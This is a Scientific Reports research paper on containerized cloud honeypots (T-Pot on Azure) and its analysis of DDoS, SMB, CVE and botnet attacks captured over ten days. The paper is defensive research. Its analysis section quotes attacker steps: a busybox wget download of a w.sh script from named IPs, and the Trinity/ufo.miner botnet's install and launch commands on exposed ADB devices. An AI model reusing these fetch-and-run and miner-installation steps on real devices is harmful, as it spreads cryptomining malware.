honeypot technology research paper

Thank you for visiting nature.com. You are using a browser version with limited support for CSS. To obtain the best experience, we recommend you use a more up to date browser (or turn off compatibility mode in Internet Explorer). In the meantime, to ensure continued support, we are displaying the site without styles and JavaScript.

• View all journals
• Explore content
• About the journal
• Publish with us
• Sign up for alerts
• Open access
• Published: 25 January 2023

Containerized cloud-based honeypot deception for tracking attackers

• V. S. Devi Priya 1   na1 &
• S. Sibi Chakkaravarthy 1   na1  

Scientific Reports volume  13 , Article number:  1437 ( 2023 ) Cite this article

6226 Accesses

9 Citations

Metrics details

• Engineering
• Mathematics and computing

Discovering malicious packets amid a cloud of normal activity, whether you use an IDS or gather and analyze machine and device log files on company infrastructure, may be challenging and time consuming. The vulnerability landscape is rapidly evolving, and it will only become worse as more and more developing technologies, such as IoT, Industrial Automation, CPS, Digital Twins, etc are digitally connected. A honey trap aids in identifying malicious packets easily as, after a few rapid calibrations to eliminate false positives. Besides analyzing and reporting particular invasion patterns or toolkits exploited, it also assists in preventing access to actual devices by simulating the genuine systems and applications functioning in the network thus delaying as well as baffling the invader. In order to analyze and evaluate the hackers’ behavior, an ensemble of research honeypot detectors has been deployed in our work. This paper delivers a robust outline of the deployment of containerized honeypot deployment, as a direct consequence, these are portable, durable, and simple to deploy and administer. The instrumented approach was monitored and generated countless data points on which significant judgments about the malevolent users’ activities and purpose could be inferred.

Similar content being viewed by others

Performance evaluation of a firewall service based on virtualized IncludeOS unikernels

A practical approach for finding anti-debugging routines in the Arm-Linux using hardware tracing

Detection and isolation of wormhole nodes in wireless ad hoc networks based on post-wormhole actions

Introduction.

As we navigate this brand-new digital revolution of massive heterogeneous data, difficult cyber security challenges started to crop up every day. It’s no surprise that cyber security issues are at their peak, and there’s a lot more to come in the future. It’s a significant concern how cyber-attacks are evolving in every way imaginable in order to stay on top of technological advancements. Phishing, crypto trojans, and cyber scamming are examples of common however threatening hacking attacks that actively pursue and take advantage of the user’s confidential information. Costs are dropped, productivity is raised, and network security is improved with a cloud-managed wireless network solution 1 . Internet and network fraudsters constantly attempt to compromise the security infrastructure of enterprises in order to grab sensitive information 2 . Hence being digitally secure becomes extremely challenging. The average cost of a data breach grew by 2.6 percent from 4.24 million USD in 2021 to 4.35 million USD in 2022 3 . From USD 3.86 million in the 2020 report, the average cost has increased by 12.7%. Further, it requires a lot of time to uncover a cyberattack. Attackers may be taking advantage of the system during this period while we are fully ignorant of it. By 2025, the global cybercrime impact is expected to hit 10.5 trillion dollars per year and digital security investment will surpass 1.75 trillion dollars 4 . This necessitates a need to investigate cyber security risks in order to effectively control the threat they pose. Intruders skilfully reap the benefits of exploitable vulnerabilities in a variety of methods that are generally difficult to pinpoint due to technological advancements. Therefore, it’s important to identify current shortcomings, how they can be used by adversaries in the manufacturing environment, and most crucially the facts they are most keen on 5 . The greatest approach to understand how to defend something is to be aware of what is going on within, which argues for security observability. In order to fully understand what is happening inside your API/microservices system and defend them from attack observability has to be employed 6 . Systems may be observed leveraging logs, statistics, and distributed traces, giving chance to spot intrusion attempts, fix security flaws, and prevent attacks before they can do significant harm. Many of these concerns are taken into account by Honeypots.

A honeypot offers information security groups broader visibility and empowers them to safeguard against assaults even the firewall can’t prevent. Many establishments worldwide incorporated them as an added layer for security from internal and external threats. A cyber honey trap lures intruders into a bait. It’s a computer system renounced to be attacked, or like a decoy designed to allure cyber attacks 2 , 7 , 8 . It imitates real phishing targets and leverages infiltration tactics to obtain intelligence about fraudsters and their methods of operation, or to divert them from all other aspirations. They might also have port numbers that seem to be accessible to a penetration test, which really is a method for determining whether ports on a node are vulnerable. The intruder may be lured by an open port, enabling the analyst to examine their attack pattern. Honeypot systems are exceptionally good at information collection, and they may also include signature-based intrusion detection, traffic acquisition, and internet protocol assessment, as well as flexible screening and fine-tuning. Honey-potting contrasts with other security techniques in that it is not aimed at preventing intrusions directly. It’s objective is to improve a firm’s intrusion detection mechanism and incident response so as to handle and mitigate assaults effectively. Anomalous and malicious traffic must be recognized in order for security personnel to analyze and restrict undesirable traffic flows in the communication network. Several machine-learning (ML) approach models that categorize harmful traffic flows using appropriate feature selection techniques 9 , 10 , 11 has been presented by researchers in order to avoid fraudulent traffic flows in the network.

The significance of our Experimentation :

Meticulously reviewed and evaluated the entire collection of information accumulated from the honeypot, whilst clearly demonstrating how to interpret them.

Along with implying major motivations as well as alternatives for launching attacks, we could also provide a thorough rational reason for distinguishing botnet attacks.

Successfully implemented a flexible polymeric decoy system that bestowed enthusiasts with a significant amount of information whilst retaining our prime goal, namely to create a prior warning entity.

The following is an overview of the manuscript formation: “ Background ” presents an outline of honeypot systems, virtualization & containerization, and precised the novelty of our experimentation, “ Conceptual models of allied frameworks ” sketches the conceptual models of allied security analysis frameworks, “ Experimental setup ” explored system experimental setup and its implementation details, “ Analysis of the captured data ” details the analysis of the captured data. Ultimately the paper concludes in “ Conclusion and future enhancements ”.

Honeypot systems

Honeypots have the virtue of being targetable and hence facilitate the investigation of security vulnerabilities or the simulation of security vulnerability countermeasures 12 . Attacking honeypots is not regarded as a hazard as they often contain no vital or genuine information. Instead of acting as a standalone security mechanism like intrusion detection system, intrusion prevention system, and firewall, honeypots are regarded to be a component of surveillance systems, and the type of security mechanism required specifies how they’re being positioned.

Categorization of honeypot systems.

Based on the purpose of honeypots (Fig. 1 ), they can be categorised as Production Honeypots and Research Honeypots 13 , 14 . Production honeypots are designed to detect intrusions in the intranet while also deceiving the malignant party. They play alongside real-world production workstations and provide the same functionality. They are commonly positioned close to surveillance assets in order to act as Indicators of Compromise (IoC) for both on-premise and external threats. Research honeypots gather information concerning intrusions, concentrating not only on how adversaries behave inside your own network but also on the broader population. Analyzing information and intelligence using honeypots can assist officials in developing robust defensive systems and determining which upgrades to activate. They are frequently positioned in a network’s Demilitarized Zone (DMZ) or that location where no operational activities occur (for example, via VLAN segmentation).

Honeypots are also categorized according to their degree of interactivity, which determines how an attacker performs intrusion on them as- High-interaction honeypot (Although they are not intended to replicate an overall production unit but do perform (or pretend to perform) most of the operations that a production process should, such as a complete operating system. The leveraging entity can observe adversary habits and strategies using this sort of honeypot), the Mid-interaction honeypot (These don’t have their own OS, but they do mimic features of the application layer protocol stack. They try to hinder or baffle adversaries so that enterprises get more time trying to sort out how to respond to an invasion), Low-interaction honeypot (These honeypots use fewer resources and collect only fundamental information on the type of risk or where it originated. They use TCP/IP (Transmission Control Protocol /Internet Protocol), and internet services and are reasonably straightforward to configure. There is, indeed, hardly anything within the honeypot that will keep the assailant’s focus for an extended period.eg: Honeyd 15 ), Pure honeypot (These are large-scale, production-like system that runs around multiple servers. It is packed with sensors and holds “sensitive” information).

Depending on the functional area honeypots can be categorized as:- Malware honeypots (Identify malware by using established replication as well as exploitation channels.eg:-Ghost 16 ), Spam honeypot(Unsecured proxies and email gateways are used in spamming honeypots to entice fraudsters. Spam traps can detect a spammer’s attempt and afterwards prohibit them from sending spam), Database honeypot (Create deception databases in order to entice database-specific exploits such as Sql injection attacks, which manipulate data in an unauthorized manner), Honeynets (comprised of multiple honeypots. Various assaults, such as DDoS (Distributed Denial-of-Service ) attacks, assaults on CDN( Content Delivery Network), and advanced persistent threats, can be examined by integrating various types of honeypots).

Depending on their intended application, honeypots can be planted both locally and externally. They are commonly installed in a demilitarized zone 17 (DMZ; sometimes referred to as “perimeter network” or “screened subnet”) on the network. DMZ refers to a physical or logical subnetwork that uncovers a corporation’s external-facing services to an unsecured, typically bigger network, namely the World wide web. To track efforts to access the internal network, honeypots can be placed outside the external firewall and pointed at the internet. It can also be installed alongside the servers of a business network. Depending on the honeypot’s level of complexity, the type of traffic it hopes to draw, and how proximate it is to critical enterprise network assets, the honeypot’s exact positioning alters. Regardless matter where it is located, it will always be substantially clipped off from the production environment. The position is optimal in the three crucial areas of an organization, as demonstrated in Fig. 2 18 .

Honeypot system placement in an organizational network.

The major objectives of deploying honeypot can be enumerated as:

To gather more about improbable threats and weaknesses.

To serve as a predefined capture mechanism in which it draws assailants’ interest.

To uncover fraudulent network activity.

To provide a defense for actual systems by concealing them so that any attempt would hit the honeypots.

To identify novel approaches and techniques (like zero-day attacks).

As compared to honeypots, firewalls are typically established over an organization’s perimeter to prevent unwanted accessibility by screening specific ports and content, however, they are not very effective at analyzing the traffic. An IDS or vulnerability detection system analyzes the communications and finds any improper, illegal, or unusual activities. But IDSs often experience the ’false warning issue’ as signature-based IDSs frequently produce false-negative warnings, whereas IDSs based on anomalies generate false -positive alerts 19 . The integration of IDSs with honeypot can greatly diminish faulty alerts.

Virtualization and containerization

Most of those conventional methods for using honeypots become quite unproductive as engineers and technology professionals integrate containerization and microservices into their solutions. Containerization renders operating system-level virtualization 20 . The program and its prerequisites are packaged together in a container, which is a secluded virtual arena. As they share the firmware and relevant components with the OS, containers offer a lightweight solution as compared to virtual machines. Concise mono modules are deployed by microservices using containerization which together result in more flexible, extensible programs. This strategy eliminates the requirement to develop and release a completely novel version on each modification or scale of a particular function 21 , 22 .

Novelty of our experimentation

Existing research 23 on containerized honeypot data analysis has mostly focused on information pertaining to Industrial Control System (ICS) devices and is insufficient to analyze all of the data that has been collected. As the honeypot is deployed in the cloud, hackers could readily distinguish it as a decoy system. Hence, we strongly believe that the findings obtained were the repercussion of bots scanning the cloud and are therefore insufficient to improve the security intelligence of the ICS system as asserted by 23 .

Our exertion could distinctly demonstrate how to interpret data by critically analyzing and evaluating the whole evidence collected from our honeypot experimentation. We could also furnish detailed justification for identifying prevalent DDoS attacks while speculating on potential causes and alternatives. It is thus summarized that the virtue of absolute security can be accomplished by integrating honeypot data with IDS/IPS system. Moreover, the contributions asserted in this review further assist to recommence the areas of investigation in smart security intelligence.

Conceptual models of allied frameworks

Since the year 2000, there were numerous distinct honeypot implementations, including fully accessible as well as commercial. Whilst some of them enable various services and emulation, others were built with a specific objective like protecting against a potential attack. Numerous authors worked in order to compile a list of honeypots.

An open and automated relay spamming research honeypot with Intellectual Simulated Analyzer (SpamPot) 24 utilize Elasticsearch or OpenSearch to store data that has been filtered from received spam. It is comprised of two parts: the analyzer and the receiver. The receiver is a server (SMTP) that takes all emails sent on their way. The email is dumped in a directory together with its associated metadata, such as the IP address of the sender, the emails of the recipients, etc. Analyzer continuously keeps an eye on this directory in order to analyze these communications. The analyzer retrieves spams out from the receiver-shared directory and parses the .eml and metadata document. Information like URLs, attachments, mail body, etc. is extracted. If third-party extensions like VirusTotal, HatchingTriage, etc are set up with API keys, the indicators that have been retrieved from the email can then be queried through those applications. Elasticsearch then indexes this extracted data for subsequent searching and analysis. They still need to be integrated with SMTP verification and VirusTotal lookup.

A project called LaBrea 25 makes a tarpit (or sticky honeypot) that establishes ’virtual computers’ that respond to connection requests by taking control of unoccupied Ipv4 on a local area network. The program assumes that the IP in concern is unused when it observes multiple successive ARP queries dispersed many clock cycles apart with no interim ARP response. Then it ’produces’ an ARP response and transmits it to the applicant with a fake MAC address. Valicek et al. 26 proposes the use of a windows high interaction honeypot targeted for deployment in an office setting. The authors’ goal was a seamless integration of the project into a production setting.

In order to assess the present threat environment as well as how intelligent and crafty bad actors may be in compromising internet-facing ICS (Industry Control System), Rashid et al. 23 implemented flexible low-interaction honeypot within AWS EC2 cloud instance over six distinct zones. Their research primarily focuses on honeypot data relevant to ICS systems and compares the top 10 AS/ASN attackers, interactions with various ICS devices and their geolocation, brute force attack rate, CVE and signature alerts, IP reputation, authentication events, various post-exploitation actions along with its sample instructions, malware signature, and interactions from different sources. Due to its installation in the cloud, hackers could easily distinguish the honeypot from a decoy. As a result, the information collected suspects to be produced by automated bots that scanned the cloud, and therefore insufficient to add on to the security intelligence of ICS systems. Methods that reduce the likelihood of a honeypot being discovered are mentioned in the work 27 , 28 , 29 , 30 .

Experimental setup

Our experimentation is based on the works undertaken by DTAG (developed by Deutsche Telekom) 31 , which use an ensemble of docker containers along with an ELK stack for the honeypot administration and data analysis respectively. It uses docker as well as docker-compose to achieve its objective of executing a large number of tools concurrently and fully leveraging the hardware of the host. After successful implementation in the local device, the approach has been migrated to the cloud. This makes the overall mechanism relatively low maintenance as it enabled us to operate several honeypot sensors without any hassles along the same connection interface. Good segregation of the sandboxes and simple updating procedures are enabled by the docker encapsulation of the honeypot daemon.

The setup is carefully and consciously made to look like a valid target, mirroring the modeling approach of its components, structure, and content. This is done to persuade the opponent that they have gained access to the real system and to tempt them to stay. The program’s inbound traffic has been configured to accept all traffic. All persistent data files from the ensemble of honeypots can be found in the folder/data. Data logs related to each honeypot can be found at /var/lib/docker/containers/*/*.log . Filebeat serves as the logging agent or log data shipper, a light-weight shipper, installing itself on the system collecting the system logs, tailing them, and transmitting the information to Logstash for more sophisticated processing. Filebeat initiates one or more inputs that search for log data in the folder designated and launches a harvester for each log it discovers 32 . Whenever the harvester scans a single log for fresh data, it transmits the fresh log data to libbeat, which aggregates the events and delivers the aggregated data to the output that is set up for Filebeat. It was created in the Go language and has been optimized to handle massive amounts of data, support cryptography, and effectively withstand rear pressure. A freeware data engine entitled Logstash (written in Ruby) is used to ingest, process data from multiple viewpoints and outputs the data through the output plug-in to Elasticsearch. All log content is patched up, transformed, and given advanced downstream visualization and analytical depth 33 . The three steps of the Logstash event processing pipeline include inputs, filters, and outputs. Events are produced by inputs(beats/file/syslog/redis), modified by filters(grok/mutate/drop/clone/goip) , and sent there by outputs(elasticsearch/file). Both inputs and outputs accept codecs, letting you encrypt or decrypt data as it moves through the pipeline without the need for an additional filter. Regardless of format or complexity, it dynamically prepares relevant information like creating patterns from unstructured data, interpreting geographical information from IP addresses, removing all sensitive fields from personally identifiable data, and anonymizing it, regardless of the source of data, structure, or schema, simplifying overall processing.

Elasticsearch, a modern search and analytics engine, is a Java-based NoSQL database based on Apache Lucene 34 . With the help of Elasticsearch, organizations can retain, explore, and analyze massive amounts of data fast and in close to real-time, with results arriving in fractions of a second. It examines an index rather than the text itself, which enables it to deliver quick search results. Instead of using records and databases, it employs a framework based on documents and has robust REST APIs (Representational State Transfer Application Programming Interface 35 ) for maintaining and accessing the data. Elasticsearch can be conceptualized as a server that can respond to JSON requests by providing JSON data. Elasticsearch data is visualized and the content is explored using the free and open-source Kibana interface. For instance, because Kibana is frequently used for log analysis, it is utilized to find out information about dissemination URLs, web hits sources, etc. The visualization of data can be commenced with one query and figured out as per requirement through interaction. A significant constraint, however, is the fact that each visualization should only be used with a specific index or indexing sequence. If an index has data that is completely different from another index, then distinct visual representations for each index must be created. Figure  3 depicts an overview of the experimental workflow.

Collaborative operational testbed for real-time implementation using docker containerized honeypot.

Overview of deployed honeypots

The system implementation provides the following images for various docker honeypots. Cowrie 36 , 37 , 38 , a medium interaction to high interaction SSH and Telnet honeypot that is the successor of the Kippo Honeypot. It is designed in Python and includes a flexible fraudulent file system, and also a falsified shell. Additionally, it is able to copy files via SFTP (SSH File Transfer Protocol) for subsequent analysis. In high interaction (Proxy mode), it functions as an SSH as well as telnet proxy to track the actions of the assailant with another system. Under medium interaction (Shell mode), it imitates a UNIX framework in Py. In the most recent version, Cowrie adds TCP/IP tunneling to capture proxy requests and the associated data. Every interaction is recorded in JSON format, and every session that is made is archived.

For the purpose of tracking and observing Multicast (UDP) Distributed Denial of Service (DDoS) assaults, the DDoSPot honeypot is deployed. It is an UDP-based platform that acts as a booby trap that aids to monitor and track DDoS attacks. The mentioned facilities or honeypot servers are supported by the system in the form of straightforward plugins referred to as pots: DNS (Domain Name System) server, NTP (Network Time Protocol) server, SSDP (Simple Service Discovery Protocol) server, CHAREN (Character Generator) server (port 19), and Random or mock UDP server. Ports 19, 123, 1900, and 53 are advertised as being used for communication.

Dionaea, a low interaction honeypot 38 , 39 , 40 that simulates and offers a wide range of protocols, including FTP (File Transfer Protocol), TFTP (Trivial FTP), HTTP (Hyper Text Transfer Protocol), HTTPS (HTTPSecure), MQTT (MQ Telemetry Transport), MSSQL (Microsoft SQL), MySQL, SIP(Session Initiation Protocol), SMB(Server Message Block), and UPnP(Universal Plug & Play). Dionaea uses the libemu library for x86 virtualization to collect suspicious activities. Heralding is a low interaction honeypot 38 , 41 that mimics a number of access interfaces in order to record inputted credentials, and source or destination ports. It offers a set of protocols, including Telnet, SSH (Secure Shell), FTP, HTTP, POP (Post Office Protocol), SMTP (Simple Mail Transfer Protocol), etc.

ADBHoney honeypot is a low interaction honeypot for the TCP/IP ADB(Android Debug Bridge) 42 . The Android Debug Bridge (ADB) protocol monitors actual and emulation-based cellphones, televisions, and DVRs linked to a specific host. It includes a number of commands (such as adb shell , adb push , etc.) that help developers push information to the machine while troubleshooting.

To analyze web applications and provide the replies that are then served by SNARE, TANNER honeypot is utilized which renders remote analysis of data and categorization service. When offering replies for SNARE (Web app honeypot detector that draws all kinds of internet coercion), TANNER employs a variety of application vulnerability type emulation strategies. Additionally, TANNER gives dorks to SNARE so that it can power its luring skills. Redis Honeypot, is a high interaction honeypot that traps redis vulnerabilities. ReDiS (Remote Dictionary Server) is an in-memory key-value data store that persists on disc. All redis data resides in memory thus enabling high throughput and low latency 43 .

Log4J honeypot is an internal network low-interaction honeypot that aids in sighting internal threats or intruders who search your network for log4j. It merely keeps an eye out for strange text patterns in queries (in input fields or Http headers) that notify via messages if anything odd shows up. Mailoney, a low-interactive SMTP honeypot that can simulate many vulnerabilities such as open_realy (logs every effort to deliver an email), postfix_creds( logs credentials of login trials), schizo_open_relay( logs every activity).

Honeytrap 44 honeypot serves as a trap for all communication in the setup that has not been caught by another honeypot. It keeps track of arriving frames and launches TCP and UDP observers so that information can be captured. Ciscoassa, low interaction honeypot for Cisco ASA ( Cisco Adaptive Security Appliance element that can find the DoS (Denial of Service) and remote code execution flaw known as CVE 2018-0101 (A flaw in the Cisco ASA (Adaptive Security Appliance) Software’s SSL Layer (Secure Socket Layer) VPN capabilities allow unauthenticated, remote potential attackers to force a system restart or remotely perform operations) has also been employed.

CitrixHoneypot identifies and records activities of CVE-2019-19781 exploit (CVE-2019-19781: Citrix Application Delivery Controller (previously known as NetScaler ADC), as well as Citrix Gateway (also known as NetScaler Gateway) have been found to include vulnerabilities that, if abused, might grant an unauthorized attacker access to execute the malicious script). The honeypot Glutton allows for the collection, recording, and analysis of forwarded traffic by serving as a gateway between an adversary and another honeypot. In general, it pays attention to every port and then operates in accordance with rules in rules.yaml (found in /root/tpotce/docker/glutton/dist/rules.yaml ) file. The predominant library used by the proxy to handle packages and carry out its functions is Freki (which orchestrates packets in userspace via NFQueue, a focus of iptables & ip6tables, that outsource the action on packets to a user mode application).

Elasticsearch, Kibana, and Logstash, which are all elements of the ELK Stack 45 , 46 , were used to analyze and visualize the honeypot data. Built on top of Apache Lucene, Elastic Search is released under the Apache license. For its decentralized search engine, it employs the REST (REpresentational State Transfer) architectural style. Kibana is an analytics software program that uses elastic search, data visualization, and input from other elastic stack elements. Subsequently, Logstash is utilized as an information gathering backend to make it simple and quick to integrate logging file storage and retrieval. The honeypots disclose a combination of well-known and uncommon ports. These include ports such as 80 and 443 (HTTP/HTTPS), port 21 (FTP), port 22 (SSH), and port 445 (SMB and Microsoft Active Directory). Port 64297 was used to give access to the dashboard using authentication mechanisms to the overall system and port 64295 for SSH access.

As decision-making tools for forensics and network surveillance, the honeypot cluster employs FATT (Fingerprint All The Things: built using pyshark, allowing the extraction of networking meta - data and trace evidence from real-time communication or datagram capturing pcap files. JA3 : TLS client or server fingerprinting, HASSH: SSH client or server fingerprinting, RDFP: RDP fingerprinting for RDP protocol guideline,etc. are the profiling techniques it integrates that aid to run threat intelligence techniques inside a communication network), p0f ( Passive Operating system Fingerprinting: Uncover the entities around any TCP/IP interaction (even a regular SYN message), purely silent flow fingerprinting without intervening in any form), and suricata. The folders /OPT/container_name/LOG and /OPT/container_name/DL of the container have logs and files uploaded to the honeypot . These paths are mapped to the host machine volumes /DATA/container_name/LOG . Additionally, certain facilities offer the tools cockpit, cyberchef, elasticsearch head, spiderfoot, and suricata, that further aid in the management, tracking, and assessment of honeypot systems as well as the dissemination of findings to the public.

Implementation

The honeypots were set up on Microsoft Azure Cloud in different regions which aid to perform an analysis of the demographics of attack vectors in diverse locations (region 1: Central India, region 2: East Japan). For the entire experiment, each instance operated Debian 11(bullseye-Gen1 image, vm instance-type E2ds_v4) and had two virtual CPUs, 16 gigabytes of memory, 128 gigabyte hard disc, and a static Ip address. The containers set up in the system operate in host-network mode, which shares the host system’s network virtualization stack hence no separate IP address is assigned. In total, the system was operational 24 hours a day for 10 days, from 27th June 2022 to 6th July 2022. In order to minimize the discrepancies brought on by week-to-week variations in the attack surface, each instance began and concluded in a synchronized manner. To expose the system to exploitation, all ports are left open for incoming traffic. This experimentation offers even more useful information that will extend cyber security to propel forward. We installed the honeypot by leveraging T-Pot installer on the cloud. Post installation prompt to create a password for the user tsec and / or create a <web-username> and password that will be used for subsequent execution. Furthermore, if tpot.conf file in the tpotce/iso/installer directory is customized, then the installer can run automatically.

Analysis of the captured data

After setting up the cloud honeypot instances at two regions the front-end interface is examined at https://< external IP address >:64297, and used the credentials created during setup to log in. Figure 4 represents the overall attacks received in both regions. Attacks commenced arriving after the IP was made public on the internet. Knowing that you will experience assaults practically immediately after exposing an IP address makes it obvious that there would be bots or scans constantly searching cloud’s IP range. The same emphasizes how crucial it is to protect our cyber assets before enabling accessibility for operations. The attack statistics obtained by our experimentation are sketched in Fig. 4 .

Attack statistics for Honeypot instances in experimental cloud geographies.

Analysis of DDoS strikes

We executed a deep dive into DDOSPOT honeypot as it had been found to report the highest frequency of hits at both instances. A variety of automated tools and services offered by third-party suppliers for DDoS as a service make it simple to start DDoS attacks 47 , 48 . It is easy for even a beginner in attacking to initiate sophisticated DDoS assaults by using the key aspects of cloud technology.

Sample commands executed by the adversaries upon accessing the system.

It’s not likely that every attack originates from an unidentified source using an unidentified IP . If an user launches any one of the cited commands, warnings may be set off by the majority of SIEMs (Security Information and Event Management). By doing this, you can establish policies to freeze the account until you receive assurance that there was no breach and perform any of those instructions. Building a defense necessitates comprehension of what adversaries undertake after gaining direct exposure. Figure  5 lists the frequently used commands by the malevolent user and Table 1 details it.

Analyzing the data acquired and using it as a point of reference for the auditing process, helps enterprises to better understand their existing security posture. Ddospot honeypot tagged known attacker, malware, tor exit node, bitcoin nodes, form spammer, mass scanner, anonymizer, bot, and crawler and of the total attacks received 71% of the attackers were known attackers that have already been outlined for engaging in despicable activities. We could pindown busybox wget vulnerability exploitation and trinity P2P malware attack (Fig. 6 ). Many-times, downloading an intermediary script that downloads the malware is preferred over downloading the infection directly. Hence attackers exploit the “busybox wget” vulnerability to download w.sh shell script from the IPs 31.7.58.162 and 163.123.142.144 ; both tagged in blacklist as per 49 .

Commands executed by the adversaries upon access for launching busybox and trinity botnet attacks.

From the analysis of Fig. 6 , when the device has been impacted with trinity malware attack, it is set up to search for all the other exploitable ones within the network having port 5555 open 50 . A shell is established and the command “pm path com.ufo.miner” is used to check if the malware is already mounted. If it has not, an apk file with the malicious programs will be sent to the entity, which will then be used to configure it and delete the installer. Following the miner’s installation, the apk’s “am start -n com.ufo.miner/com.example.test.MainActivity” command initiates the ufo bot. If the trinity bot is not already running, the command “ps \(\Vert\) grep trinity” is performed, and if not, the “trinity” , “nohup” , and “script” files are installed and the “tmp” directory is cleared. Using chmod , the permissions on the nohup and trinity files are edited in such a way that all have read as well as execute permissions while the owner has read as well as write permissions. The Trinity botnet assault has the consequence of including affected machines in the botnet, which then continues to harvest cryptocurrencies for the assailant.

Unique source IP count by the Ddospot honeypot.

By tracking fluctuations in the number of distinct source ip addresses over the course of an event window and the number of source IPs with data transmission outstrips a specified threshold, the information on the number of distinct source IPs can be used as a DDoS attack detection component 51 . The count of distinct Src IP addresses and the number of non - complying source IP addresses can be assessed during each period of observation (Fig. 7 ) to look for security breaches. Both will deviate less from their mean values in normal circumstances, but during an attack, this deviation becomes more prominent.

Attackers Source IP count percentage by Ddos honeypot.

Owing to the fact that the top four attackers on the list in region1 (Fig. 8 ) 157.230.64.246, 47.101.147.143, 178.237.56.152, 45.45.45.45 had more hits than others in the list, we prefer to concentrate our research on them. The IP reputation lookup from WhatIsMyIPAddress and DNSChecker designates DigitalOcean-ASN ISP 157.230.64.246 as malicious as it reported spam score of 508.4 49 . The IP 47.101.147.143 from the network owner Hangzhou Alibaba Advertising Co.Ltd reported a critical spam level and have poor email reputation. The IP addresses 178.237.56.152 from Amsterdam, Netherlands (owner Hostcircle b.v.) and 45.45.45.45 from ISP Videotron Lee, Canada, have been flagged for IP and domain reputation issues by DNSBL(Domain Name System Blacklist: https://matrix.spfbl.net/ipaddress ) and VirusTotal ( https://virustotal.com ). E-mails posted from these IPs have been either banned or sent to the recipient’s spam box, or treated accordingly. The remaining IP addresses are also listed on blocklists and are categorized as assailants.

Suspicious URL commands

Some of the intruders attempted to download malicious content from other sources after they gained access to our honeypot (Fig. 9 ). The details of the malicious URLs (ref: https://www.virustotal.com ) has been listed in Table 2 . SHA-256 column in the table denotes the body of the HTTP reply that the server provided back after being asked for the URL being looked up.

Suspicious URL commands.

Auxillary analysis

P0f that performs passive operating system detection using SYN packets aids in identifying the operating systems prevalent on the devices used by attackers. Distinct operating systems are employed to carry out strikes, mostly from Linux 2.2.x–3.x OSs and Windows 7 or 8 OSs as shown in Fig. 10 . Linux is a popular operating system option for hackers for its adaptability, open source nature, portability, command-line interface, and interoperability including well hacking tools.

List of operating systems utilized by the intruders for launching invasion.

Details of top CVEs identified by the honeypot system.

Suricata CVE data is another resourceful element in the interface. CVE identification is offered by the advanced threat engine Suricata 52 , 53 . Recent CVEs being exploited are CVE-2021-36260(web server flaw: across several Hikvision appliances that involves command injection. Attackers can use the flaw to execute a command injection assault by delivering some messages that include malicious commands since there is inadequate input authentication), CVE-2020-11899 (Treck TCP/IP stack exploit: incorrect input validation when accepting a packet sent by an illegal access attacker in an IPv6 component. This flaw could lead to an out-of-bounds read as well as a Denial of Service). It is obvious that attackers are still using the prior flaws (Fig. 11 ) and hence organizations should address those deficiencies at the earliest.

Details of alert signatures identified by the honeypot system.

ICMP_INFO PING & UDPv4 invalid checksum , are the highly reported alert signature by suricata as shown in Fig. 12 . ICMP_INFO PING reveals that ping is still the widely used reconnaissance tool used by hackers to determine whether the specific host is reachable via an IP network or not. In UDP, no assurance that the packets will be received at the other end. However, if they are indeed delivered, are examined and dropped if they mismatch the checksum ( UDPv4 invalid checksum ). A User Datagram Protocol (UDP) overflow is a type of massive DoS attack in which the attacker hits and flushes arbitrary ports on the target with IPv4 packets that contain UDP packets 54 . This indeed results ultimately contributes to significant hits in the DDoS honeypot.

Hits reveal that the overwhelming attacks target SMB on port 445. This is the service that many exploit, including the more current SMBBleed/SMBGhost and Eternal Blue/WannaCry ( CVE-2017-0144 ), ( CVE-2020-1206 ). All throughout the world, strikes were reported, with the typical offenders being named 55 . This information can be used to carefully restrict access to those regions’ ASNs and IP addresses for vital services. The interesting fact that there were no hits on the Log4j honeypot could be attributed to the organizations being highly informed and upgrading to a patched Log4j version.

Conclusion and future enhancements

Despite not being a cutting-edge technology, honeypots appear to significantly increase the volume of information that an enterprise can harvest. Whilst honeypot information security would aid in the mapping of the threat landscape, they are equipped in seeing activities aimed only at honeypot. We cannot simply say that a threat doesn’t exist just because it hasn’t been addressed at the honeypot.

We were successful in operationalizing a quick polymeric system that offers researchers a great deal of information while keeping in mind our primary objective for the work, that of a real-time warning asset. The honeypots performed effectively in obtaining high associations and a lot of samples of malware that were significant during our experiment. We could also catch events for DDoS attack which was predominant. System setup offered a great all-in-one solution to commence tracking actual attacks on numerous services in real-time. The front-end monitors offered a fantastic approach for analyzing and organizing patterns among attacks and creating visually striking and potent perspectives from the front line of the web. Several honeypot frameworks have been proposed merely as proofs of concepts, and their designers no more provide assistance for them. Long-term ventures are infrequent. Works in the future can utilize the knowledge gathered from the system to investigate zero-day vulnerabilities and develop IP delisting and intrusion detection and prevention system policies. In our forthcoming revision, we envisage addressing the failure of the system to give an early warning when DDoS traffic is spotted by integrating intelligence.

Data availibility

The datasets generated and analyzed during the current study are available at the link: RAW DATA .

Dwivedi, R. K. & Kumar, R. Sensor cloud: Integrating wireless sensor networks with cloud computing. in 2018 5th IEEE Uttar Pradesh Section International Conference on Electrical, Electronics and Computer Engineering (UPCON) . 1–6. https://doi.org/10.1109/UPCON.2018.8597008 (IEEE, 2018).

Baykara, M. & Das, R. A novel honeypot based security approach for real-time intrusion detection and prevention systems. J. Inf. Secur. Appl. 41 , 103–116 (2018).

Google Scholar  

Ibm Report: How Much Does a Data Breach Cost in 2022 ? Accessed 08 Dec 2022 (2022).

Northport. N.Y. Cybercrime Magazine (2021).

Batchu, R. K. & Seetha, H. A generalized machine learning model for DDoS attacks detection using hybrid feature selection and hyperparameter tuning. Comput. Netw. 200 , 108498. https://doi.org/10.1016/j.comnet.2021.108498 (2021).

Article   Google Scholar  

Halvorsen, J., Waite, J. & Hahn, A. Evaluating the observability of network security monitoring strategies with tomato. IEEE Access 7 , 108304–108315. https://doi.org/10.1109/ACCESS.2019.2933415 (2019).

Kumar, R.S.S., Wicker, A. & Swann, M. Practical machine learning for cloud intrusion detection: Challenges and the way forward. in Proceedings of the 10th ACM Workshop on Artificial Intelligence and Security . 81–90 (2017).

Agrawal, N. & Tapaswi, S. The performance analysis of honeypot based intrusion detection system for wireless network. Int. J. Wirel. Inf. Netw. 24 , 14–26 (2017).

Shafiq, M., Tian, Z., Sun, Y., Du, X. & Guizani, M. Selection of effective machine learning algorithm and Bot–IoT attacks traffic identification for internet of things in smart city. Future Gener. Comput. Syst. 107 , 433–442. https://doi.org/10.1016/j.future.2020.02.017 (2020).

